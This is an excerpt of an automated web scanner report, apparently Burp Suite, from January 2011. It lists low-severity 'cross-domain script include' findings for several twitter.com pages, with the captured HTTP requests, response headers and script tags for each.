http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158
http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296181158
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /slaterusa HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:10:11 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234611-15123-40705
ETag: "832f661d0a321cbbeb6ed5afff3ac358"
Last-Modified: Fri, 28 Jan 2011 17:10:11 GMT
X-Runtime: 0.01082
Content-Type: text/html; charset=utf-8
Content-Length: 47146
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--e41b589258f43ce00a3c10f5af818420400a35c0; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296181158" type="text/javascript"></script>
...[SNIP]...

18.550. http://twitter.com/slaterusa/status/28450023532396544 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/slaterusa/status/28450023532396544

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /slaterusa/status/28450023532396544 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:32:24 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225144-26936-49516
ETag: "cd4ad1c42c2fbe7bf5766270caa6d4c2"
Last-Modified: Fri, 28 Jan 2011 14:32:24 GMT
X-Runtime: 0.04282
Content-Type: text/html; charset=utf-8
Content-Length: 13655
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjpodHRwOi8vdHdpdHRlci5jb20vc2xhdGVydXNh%250AL3N0YXR1cy8yODQ1MDAyMzUzMjM5NjU0NDoMY3NyZl9pZCIlODhmMDEzZThk%250AZjU0ODI2Y2NmNWZlZjI4NDg3MDNkMWY6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO%250A8MwtAQ%253D%253D--b7fb88baf634d9facd394658f54740ddc1030b36; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158" type="text/javascript"></script>
...[SNIP]...

18.551. http://twitter.com/slaterusa/status/28450023532396544 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/slaterusa/status/28450023532396544

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /slaterusa/status/28450023532396544 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:16 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225016-9032-41579
ETag: "2d649e661e9650b58e26ecd35a90c033"
Last-Modified: Fri, 28 Jan 2011 14:30:16 GMT
X-Runtime: 0.06669
Content-Type: text/html; charset=utf-8
Content-Length: 13654
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjpodHRwOi8vdHdpdHRlci5jb20vc2xhdGVydXNh%250AL3N0YXR1cy8yODQ1MDAyMzUzMjM5NjU0NDoMY3NyZl9pZCIlMTFkMDY1ODkx%250AZmIzMTRjNTM4NzA5ZWFmNDcwOGFkNTI6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO%250A8MwtAQ%253D%253D--aa39b3f6965406bbcece36f3eda8aef0cfd70c30; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.552. http://twitter.com/slaterusa/status/28450023532396544 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/slaterusa/status/28450023532396544

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903
http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /slaterusa/status/28450023532396544 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:10:12 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234612-85706-15968
ETag: "2a5a86cee075651fa28bafc5f6e1f152"
Last-Modified: Fri, 28 Jan 2011 17:10:12 GMT
X-Runtime: 0.04449
Content-Type: text/html; charset=utf-8
Content-Length: 13524
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7DDoOcmV0dXJuX3RvIjpodHRwOi8vdHdpdHRlci5jb20vc2xhdGVydXNh%250AL3N0YXR1cy8yODQ1MDAyMzUzMjM5NjU0NDoVaW5fbmV3X3VzZXJfZmxvdzA6%250ADGNzcmZfaWQiJWFiYzQ1NWM5YjQ1NWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0%250Ael9uYW1lIhRDZW50cmFsIEFtZXJpY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO%250A8MwtAQ%253D%253D--c854af3d5ce32e01b240b192c606a132659b1f88; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.553. http://twitter.com/stubbornella previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/stubbornella

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903
http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:44 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225044-17908-9667
ETag: "c8f4f53596f1bb2e5586d7d17efcc5c7"
Last-Modified: Fri, 28 Jan 2011 14:30:44 GMT
X-Runtime: 0.01178
Content-Type: text/html; charset=utf-8
Content-Length: 53443
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.554. http://twitter.com/thehomeorg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/thehomeorg

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296248415
http://a1.twimg.com/a/1296245718/javascripts/dismissable.js?1296248415
http://a1.twimg.com/a/1296245718/javascripts/geov1.js?1296248415
http://a1.twimg.com/a/1296245718/javascripts/twitter.js?1296248415
http://a3.twimg.com/a/1296245718/javascripts/api.js?1296248415
http://a3.twimg.com/a/1296245718/javascripts/lib/gears_init.js?1296248415
http://a3.twimg.com/a/1296245718/javascripts/lib/jquery.tipsy.min.js?1296248415
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:47:23 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265643-97614-35318
ETag: "131b1fb1d163bdaa604bee260ed9d1f1"
Last-Modified: Sat, 29 Jan 2011 01:47:23 GMT
X-Runtime: 0.01375
Content-Type: text/html; charset=utf-8
Content-Length: 53580
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMY3NyZl9pZCIlYWJjNDU1YzliNDU1YmMzN2QwZmQyOWYyNmE1ZTMx%250AMWM6FWluX25ld191c2VyX2Zsb3cwOg9jcmVhdGVkX2F0bCsIM07wzC0BOgx0%250Ael9uYW1lIhRDZW50cmFsIEFtZXJpY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--20fad198c863fbb6166907be6f67cbeb22702d85; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/twitter.js?1296248415" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/lib/jquery.tipsy.min.js?1296248415" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/lib/gears_init.js?1296248415" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296248415" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/geov1.js?1296248415" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/api.js?1296248415" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296248415" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/dismissable.js?1296248415" type="text/javascript"></script>
...[SNIP]...

18.555. http://twitter.com/tos previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/tos

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/layout_newtwitter.js?1296181158
http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:20 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225079-3564-32486
ETag: "735f941540ad8cdd9d04c136eca0b0ca"
Last-Modified: Fri, 28 Jan 2011 14:31:19 GMT
X-Runtime: 0.05573
Content-Type: text/html; charset=utf-8
Content-Length: 30493
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlYTVmY2EyMDkzM2Y2ZWRjNTgyZmQ3ZDA5ZDQwYWE1%250AMDY6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--2b07f7d8732d93af6476b2abb8e4dcef9120730e; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/layout_newtwitter.js?1296181158" type="text/javascript"></script>
...[SNIP]...

18.556. http://twitter.com/tos previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/tos

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/layout_newtwitter.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:33:26 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225206-62368-4222
ETag: "9ec4db6c5dfe828a29cb753526e0577f"
Last-Modified: Fri, 28 Jan 2011 14:33:26 GMT
X-Runtime: 0.04178
Content-Type: text/html; charset=utf-8
Content-Length: 30493
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlOWNjNWVmMWYwNTExM2I3OWEzOWE0ZWQ5YjA3Mjg0%250AMDE6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--d18d5921e88204fd160c229830aecd178c24a750; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

